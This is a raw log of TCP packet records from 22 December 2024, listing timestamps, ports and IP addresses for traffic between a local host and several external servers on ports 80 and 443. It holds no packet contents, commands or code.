Dec 22, 2024 02:16:31.725951910 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.726025105 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.726669073 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.726826906 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.726897955 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.727525949 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.727679014 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.727750063 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.728368998 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.728481054 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.728554964 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.729229927 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.729396105 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.729468107 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.730093956 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.730200052 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.730273962 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.730916023 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.731023073 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.731095076 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.731771946 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.731882095 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.731950998 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.732649088 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.732729912 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.732795954 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.733479023 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.733619928 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.733686924 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.734318018 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.734425068 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.734488964 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.735169888 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.735418081 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.735482931 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.736049891 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.736162901 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.736226082 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.736886024 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.736996889 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.737061977 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.737706900 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.737828970 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.737890005 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.738549948 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.738657951 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.738730907 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.739372015 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.740055084 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.887346983 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.887398958 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.887437105 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.887461901 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.887487888 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.887490034 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.888292074 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.888314962 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.888339996 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.888416052 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.888458014 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.889134884 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.889292002 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.889292955 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.889972925 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.890028000 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.890093088 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.890820980 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.890870094 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.890916109 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.890960932 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.891689062 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.891797066 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.891849041 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:32.377830029 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:32.377890110 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:32.377914906 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:32.377947092 CET	49814	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:32.377948999 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:32.377966881 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:32.377986908 CET	49814	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:32.378380060 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:32.378424883 CET	49814	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:32.378432035 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:32.386059046 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:32.386111975 CET	49814	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:32.386121035 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:32.401421070 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:32.401580095 CET	49814	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:32.401590109 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:32.569725037 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:32.569776058 CET	49814	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:32.569797993 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:32.573498964 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:32.573522091 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:32.573542118 CET	49814	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:32.573549032 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:32.573592901 CET	49814	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:32.573596954 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:32.573607922 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:32.573643923 CET	49814	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:33.075783968 CET	49814	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:33.075819969 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:33.075835943 CET	49814	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:33.075844049 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:34.054493904 CET	49822	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:34.054549932 CET	443	49822	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:34.054625988 CET	49822	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:34.056826115 CET	49822	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:34.056842089 CET	443	49822	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:34.502016068 CET	49823	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:34.502048016 CET	443	49823	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:34.502332926 CET	49823	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:34.503246069 CET	49823	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:34.503262043 CET	443	49823	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:34.514166117 CET	49802	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:34.514858961 CET	49824	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:34.634598017 CET	80	49824	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:34.634710073 CET	49824	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:34.634877920 CET	49824	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:34.635761976 CET	80	49802	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:34.635821104 CET	49802	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:34.754498005 CET	80	49824	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:35.270349979 CET	443	49822	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:35.270546913 CET	49822	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:35.297254086 CET	49822	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:35.297281027 CET	443	49822	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:35.297513008 CET	443	49822	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:35.298516035 CET	49822	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:35.298645020 CET	49822	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:35.298672915 CET	443	49822	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:35.298748016 CET	49822	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:35.298753977 CET	443	49822	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:35.730483055 CET	443	49823	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:35.730535984 CET	49823	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:35.732847929 CET	49823	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:35.732851982 CET	443	49823	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:35.733170033 CET	443	49823	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:35.797281981 CET	49823	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:35.797307968 CET	49823	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:35.797431946 CET	443	49823	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:35.970523119 CET	80	49824	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:35.972596884 CET	49824	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:35.975162983 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:35.975424051 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:36.095309019 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:36.095439911 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:36.095678091 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:36.095691919 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:36.122577906 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:36.162671089 CET	443	49823	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:36.162785053 CET	443	49823	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:36.162905931 CET	443	49823	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:36.163011074 CET	49823	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:36.163028955 CET	443	49823	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:36.163058996 CET	49823	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:36.163075924 CET	49823	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:36.163255930 CET	49823	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:36.163270950 CET	443	49823	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:36.163296938 CET	49823	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:36.163301945 CET	443	49823	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:36.198367119 CET	49831	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:36.198398113 CET	443	49831	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:36.198477030 CET	49831	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:36.198796988 CET	49831	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:36.198808908 CET	443	49831	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:36.242800951 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:36.418911934 CET	443	49822	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:36.418993950 CET	443	49822	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:36.419158936 CET	49822	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:36.419522047 CET	49822	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:36.419533968 CET	443	49822	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:36.521477938 CET	49832	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:36.521605968 CET	443	49832	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:36.521718979 CET	49832	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:36.522161007 CET	49832	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:36.522238970 CET	443	49832	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:37.412328959 CET	443	49831	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:37.412390947 CET	49831	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:37.413748026 CET	49831	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:37.413754940 CET	443	49831	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:37.414076090 CET	443	49831	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:37.419603109 CET	49831	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:37.419624090 CET	49831	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:37.419677019 CET	443	49831	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:37.420952082 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.421088934 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.421122074 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.421176910 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.421175957 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.421176910 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.421176910 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.421206951 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.421242952 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.421250105 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.421276093 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.421278000 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.421344042 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.421430111 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.421458960 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.421504974 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.421504974 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.421526909 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.421627045 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.541243076 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.541310072 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.541385889 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.545195103 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.545262098 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.545329094 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.546560049 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.553843975 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.555664062 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.613290071 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.613344908 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.613482952 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.613483906 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.617240906 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.617352009 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.617546082 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.625715017 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.626311064 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.628705978 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.628814936 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.628890038 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.637305975 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.637505054 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.637698889 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.646107912 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.646162033 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.646281958 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.646281958 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.654396057 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.654503107 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.654676914 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.654676914 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.662787914 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.662842035 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.663002014 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.663002968 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.671443939 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.671503067 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.671673059 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.671674013 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.678733110 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.678823948 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.679017067 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.686192989 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.686383963 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.686574936 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.693672895 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.693725109 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.693777084 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.693778038 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.700968981 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.701303005 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.742392063 CET	443	49832	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:37.742475986 CET	49832	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:37.772667885 CET	49832	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:37.772742987 CET	443	49832	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:37.773086071 CET	443	49832	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:37.774344921 CET	49832	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:37.774344921 CET	49832	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:37.774442911 CET	443	49832	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:37.805308104 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.805351973 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.805533886 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.806418896 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.806484938 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.806679010 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.808161974 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.810777903 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.810842037 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.810913086 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.811142921 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.814127922 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.814253092 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.814318895 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.818821907 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.818862915 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.819070101 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.823050976 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.823122025 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.823524952 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.823585987 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.827193022 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.827390909 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.827627897 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.831511021 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.831639051 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.831705093 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.835997105 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.836051941 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.836281061 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.840377092 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.840445995 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.840604067 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.844404936 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.844501019 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.844573975 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.848567963 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.848656893 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.848736048 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.852756023 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.852817059 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.853013039 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.857117891 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.857156038 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.857204914 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.857204914 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.861238003 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.861339092 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.861555099 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.865793943 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.865879059 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.866091967 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.869997025 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.870053053 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.870193958 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.874308109 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.874360085 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.874459982 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.878407001 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.878453970 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.878655910 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.882738113 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.882790089 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.882882118 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.887145996 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.887200117 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.887418032 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.891483068 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.891535044 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.891844034 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.895503044 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.895558119 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.895756960 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.899585009 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.899811983 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:37.900005102 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:37.903995037 CET	80	49830	31.41.244.11	192.168.2.4
